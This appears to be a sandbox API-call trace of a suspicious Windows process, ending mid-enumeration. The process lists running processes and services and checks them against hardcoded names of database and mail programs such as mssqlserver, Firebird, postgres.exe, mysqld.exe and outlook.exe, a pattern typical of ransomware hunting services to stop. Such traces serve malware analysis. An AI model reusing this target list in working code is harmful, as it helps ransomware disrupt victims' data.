	[0156.738] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0156.738] lstrlenW (lpString="svchost.exe") returned 11
	[0156.738] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0156.738] lstrlenW (lpString="taskhost.exe") returned 12
	[0156.738] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0156.739] lstrlenW (lpString="userinit.exe") returned 12
	[0156.739] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0156.739] lstrlenW (lpString="dwm.exe") returned 7
	[0156.739] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0156.739] lstrlenW (lpString="explorer.exe") returned 12
	[0156.739] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0156.740] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0156.740] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0156.740] lstrlenW (lpString="reader_sl.exe") returned 13
	[0156.740] Process32NextW (in: hSnapshot=0x388, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0
	[0156.740] CloseHandle (hObject=0x388) returned 1
	[0156.740] Sleep (dwMilliseconds=0x1f4) 
	[0157.325] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617228
	[0157.561] EnumServicesStatusExW (in: hSCManager=0xb617228, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0157.561] GetLastError () returned 0xea
	[0157.561] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xe90) returned 0xb612378
	[0157.561] EnumServicesStatusExW (in: hSCManager=0xb617228, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xe90, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0157.561] CloseServiceHandle (hSCObject=0xb617228) returned 1
	[0157.562] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0157.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0157.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0157.562] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0157.562] lstrlenW (lpString="AudioSrv") returned 8
	[0157.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0157.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0157.562] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0157.562] lstrlenW (lpString="BFE") returned 3
	[0157.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0157.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0157.562] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0157.562] lstrlenW (lpString="CryptSvc") returned 8
	[0157.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0157.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0157.562] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0157.562] lstrlenW (lpString="CscService") returned 10
	[0157.562] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0157.562] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0157.562] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0157.562] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0157.563] lstrlenW (lpString="DcomLaunch") returned 10
	[0157.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0157.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0157.563] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0157.563] lstrlenW (lpString="Dhcp") returned 4
	[0157.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0157.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0157.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0157.563] lstrlenW (lpString="Dnscache") returned 8
	[0157.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0157.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0157.563] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0157.563] lstrlenW (lpString="DPS") returned 3
	[0157.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0157.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0157.563] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0157.563] lstrlenW (lpString="eventlog") returned 8
	[0157.563] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0157.563] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0157.563] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0157.563] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0157.563] lstrlenW (lpString="EventSystem") returned 11
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0157.564] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0157.564] lstrlenW (lpString="gpsvc") returned 5
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0157.564] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0157.564] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0157.564] lstrlenW (lpString="iphlpsvc") returned 8
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0157.564] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0157.564] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0157.564] lstrlenW (lpString="LanmanServer") returned 12
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0157.564] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0157.564] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0157.564] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0157.564] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0157.564] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0157.564] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0157.564] lstrlenW (lpString="lmhosts") returned 7
	[0157.564] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0157.564] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0157.565] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0157.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0157.565] lstrlenW (lpString="MMCSS") returned 5
	[0157.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0157.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0157.565] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0157.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0157.565] lstrlenW (lpString="MpsSvc") returned 6
	[0157.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0157.565] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0157.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0157.565] lstrlenW (lpString="NlaSvc") returned 6
	[0157.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0157.565] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0157.565] lstrlenW (lpString="nsi") returned 3
	[0157.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0157.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0157.565] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0157.565] lstrlenW (lpString="PcaSvc") returned 6
	[0157.565] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0157.565] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0157.566] lstrlenW (lpString="PlugPlay") returned 8
	[0157.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0157.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0157.566] lstrlenW (lpString="Power") returned 5
	[0157.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0157.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0157.566] lstrlenW (lpString="ProfSvc") returned 7
	[0157.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0157.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0157.566] lstrlenW (lpString="RpcEptMapper") returned 12
	[0157.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0157.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0157.566] lstrlenW (lpString="RpcSs") returned 5
	[0157.566] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0157.566] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0157.566] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0157.566] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0157.567] lstrlenW (lpString="SamSs") returned 5
	[0157.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0157.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0157.567] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0157.567] lstrlenW (lpString="Schedule") returned 8
	[0157.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0157.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0157.567] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0157.567] lstrlenW (lpString="SENS") returned 4
	[0157.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0157.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0157.567] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0157.567] lstrlenW (lpString="ShellHWDetection") returned 16
	[0157.567] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0157.567] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0157.567] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0157.568] lstrlenW (lpString="Spooler") returned 7
	[0157.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0157.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0157.568] lstrlenW (lpString="SysMain") returned 7
	[0157.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0157.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0157.568] lstrlenW (lpString="Themes") returned 6
	[0157.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0157.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0157.568] lstrlenW (lpString="TrkWks") returned 6
	[0157.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0157.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0157.568] lstrlenW (lpString="UxSms") returned 5
	[0157.568] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0157.568] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0157.568] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0157.568] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0157.569] lstrlenW (lpString="Winmgmt") returned 7
	[0157.569] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0157.569] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0157.569] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0157.569] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0157.569] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0157.569] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0157.569] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3e8
	[0157.570] Process32FirstW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0157.571] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0157.571] lstrlenW (lpString="System") returned 6
	[0157.571] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0157.571] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0157.571] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0157.571] lstrlenW (lpString="smss.exe") returned 8
	[0157.571] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0157.571] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0157.572] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0157.572] lstrlenW (lpString="csrss.exe") returned 9
	[0157.572] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0157.572] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0157.572] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0157.572] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0157.572] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0157.572] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0157.572] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0157.572] lstrlenW (lpString="wininit.exe") returned 11
	[0157.573] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0157.573] Process32NextW (in: hSnapshot=0x3e8, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0157.573] lstrlenW (lpString="csrss.exe") returned 9
	[0157.573] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0157.573] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0157.573] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0157.573] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0157.573] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
